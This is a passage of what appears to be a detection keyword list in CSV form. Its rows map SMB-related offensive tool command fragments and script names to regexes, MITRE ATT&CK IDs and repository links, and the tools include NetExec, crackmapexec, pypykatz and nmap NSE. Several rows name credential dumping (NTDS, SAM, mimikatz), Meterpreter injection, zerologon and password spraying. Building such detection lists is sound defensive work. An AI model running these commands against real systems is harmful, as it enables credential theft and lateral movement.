TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -M masky -o CA=*",".{0,1000}\ssmb\s.{0,1000}\s\-M\smasky\s\-o\sCA\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -M msol *",".{0,1000}\ssmb\s.{0,1000}\s\-M\smsol\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * -M ntlmv1 *",".{0,1000}\ssmb\s.{0,1000}\s\-M\sntlmv1\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * -M rdp -o ACTION=enable*",".{0,1000}\ssmb\s.{0,1000}\s\-M\srdp\s\-o\sACTION\=enable.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -M runasppl*",".{0,1000}\ssmb\s.{0,1000}\s\-M\srunasppl.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -M zerologon*",".{0,1000}\ssmb\s.{0,1000}\s\-M\szerologon.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * --ntds --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-ntds\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * --sam --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-sam\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * -u * -p * * -M dfscoerce*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-M\sdfscoerce.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * * --rid-brute*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-\-rid\-brute.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * * --shares --filter-shares *",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-\-shares\s\-\-filter\-shares\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * * -X whoami --obfs*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s.{0,1000}\s\-X\swhoami\s\-\-obfs.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * -M enum_av*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\senum_av.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * -M enum_dns*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\senum_dns.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * -M gpp_password*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\sgpp_password.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * -M met_inject *",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-M\smet_inject\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb * -u * -p * --wmi ""select Name from win32_computersystem""*",".{0,1000}\ssmb\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-wmi\s\""select\sName\sfrom\swin32_computersystem\"".{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* smb client * shares *use c$*",".{0,1000}\ssmb\sclient\s.{0,1000}\sshares\s.{0,1000}use\sc\$.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* smb -M mimikatz --options*",".{0,1000}\ssmb\s\-M\smimikatz\s\-\-options.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* smb shareenum *smb2+ntlm-password*",".{0,1000}\ssmb\sshareenum\s.{0,1000}smb2\+ntlm\-password.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "* smb* -u '' -p ''*",".{0,1000}\ssmb.{0,1000}\s\-u\s\'\'\s\-p\s\'\'.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* SMB_Staging.c*",".{0,1000}\sSMB_Staging\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "* smb2-capabilities.nse*",".{0,1000}\ssmb2\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb2-security-mode.nse*",".{0,1000}\ssmb2\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -smb2support --interactive *",".{0,1000}\s\-smb2support\s\-\-interactive\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* smb2-time.nse*",".{0,1000}\ssmb2\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb2-vuln-uptime.nse*",".{0,1000}\ssmb2\-vuln\-uptime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-brute.nse*",".{0,1000}\ssmb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-cmds.txt*",".{0,1000}\ssmb\-cmds\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* smb-double-pulsar-backdoor.nse*",".{0,1000}\ssmb\-double\-pulsar\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-domains.nse*",".{0,1000}\ssmb\-enum\-domains\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-groups.nse*",".{0,1000}\ssmb\-enum\-groups\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-processes.nse*",".{0,1000}\ssmb\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-services.nse*",".{0,1000}\ssmb\-enum\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-sessions.nse*",".{0,1000}\ssmb\-enum\-sessions\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-shares.nse*",".{0,1000}\ssmb\-enum\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-enum-users.nse*",".{0,1000}\ssmb\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smbexec.py*",".{0,1000}\ssmbexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* smb-flood.nse*",".{0,1000}\ssmb\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* SMBGrab.pl*",".{0,1000}\sSMBGrab\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* SMBHunt.pl*",".{0,1000}\sSMBHunt\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* SMBList.pl*",".{0,1000}\sSMBList\.pl.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* -SmbLoginSpray *",".{0,1000}\s\-SmbLoginSpray\s.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* smb-ls.nse*",".{0,1000}\ssmb\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-mbenum.nse*",".{0,1000}\ssmb\-mbenum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-os-discovery.nse*",".{0,1000}\ssmb\-os\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-print-text.nse*",".{0,1000}\ssmb\-print\-text\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-protocols.nse*",".{0,1000}\ssmb\-protocols\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-psexec.nse*",".{0,1000}\ssmb\-psexec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smbrelayserver.py*",".{0,1000}\ssmbrelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "* smb-security-mode.nse*",".{0,1000}\ssmb\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-server-stats.nse*",".{0,1000}\ssmb\-server\-stats\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smbsr.db*",".{0,1000}\ssmbsr\.db.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* smbsr.log*",".{0,1000}\ssmbsr\.log.{0,1000}","offensive_tool_keyword","SMBSR","Lookup for interesting stuff in SMB shares","T1110.001 - T1046 - T1021.002 - T1077.001 - T1069.002 - T1083 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Reconnaissance","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* smbsr.log*",".{0,1000}\ssmbsr\.log.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* smbsr.py*",".{0,1000}\ssmbsr\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* smbsr_results.csv*",".{0,1000}\ssmbsr_results\.csv.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "* smb-system-info.nse*",".{0,1000}\ssmb\-system\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* smb-vuln-conficker.nse*",".{0,1000}\ssmb\-vuln\-conficker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE 